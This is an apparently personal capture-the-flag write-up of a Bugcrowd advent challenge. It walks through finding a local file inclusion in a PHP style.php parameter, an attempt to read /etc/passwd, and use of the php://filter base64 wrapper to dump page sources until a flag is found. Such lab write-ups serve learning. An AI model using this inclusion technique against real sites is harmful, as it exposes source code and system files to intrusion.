Bugcrowd elfi challenge

The Bugcrowd has thrown down the gauntlet to all hackers out there.

HINT-1: “I am eLFI.”

• First, I visited this link: Bugcrowd Advent Challenge.
• I attempted to log in with user1 and Randompassword123 as credentials, which resulted in an internal server error, as shown below:

• I tinkered with the login.php page, but no luck.
• I delved into the source code of login.php and found a few interesting lines that caught my attention, as highlighted below:

• I remembered the hint, and these lines of code seemed related.
• This led me to discover a vulnerable endpoint: `/style.php?css_file=custom.css.
• It appeared to filter out /etc/passwd, so I attempted URL and BASE64 encoding, but no luck.
• After some more exploration, I noticed another file: `index.php.
• When I tried to open it, it redirected me to login.php. However, in the network tab, I saw index.php` with a status code of 302.
• I felt suspicious about index.php and decided to investigate further:

• I used php://filter/convert.base64-encode/resource=<filename> to bypass restrictions and view the source code of `index.php.

• index.php revealed an encoded string, which I decoded using CyberChef:

• After decoding, I found another PHP file: dashboard.php. I replaced index.php with `dashboard.php:

• dashboard.php presented another encoded string, which I decoded again.
• After decoding, I found yet another file: `sober.php.

• I replaced dashboard.php with sober.php and discovered another encoded string in the comments, although smaller than the earlier ones:

• After decoding, I obtained the following code: FLAG{d1g_d33p_and_find_7he_power_within}:

I don’t know why, but I was drawn to this challenge and even took some time off work to solve it. Thanks to Bugcrowd for the fun challenge!

The challenge might seem simple after reading this walkthrough, but believe me, it took a lot of brainpower and time to execute.

I’d like to extend my gratitude to my friend, Paweł Wąsik, for his constant support.

References:

• Using PHP Wrappers within LFI to Obtain PHP Script Source Code
• You find a Local File Inclusion (LFI) running PHP, you’re able to leverage a PHP wrapper to convert the file to Base64…infinitelogins.com

Connect with me at: LinkedIn, Twitter

Here’s a link to the next fun klown.cfm 🎪 challenge.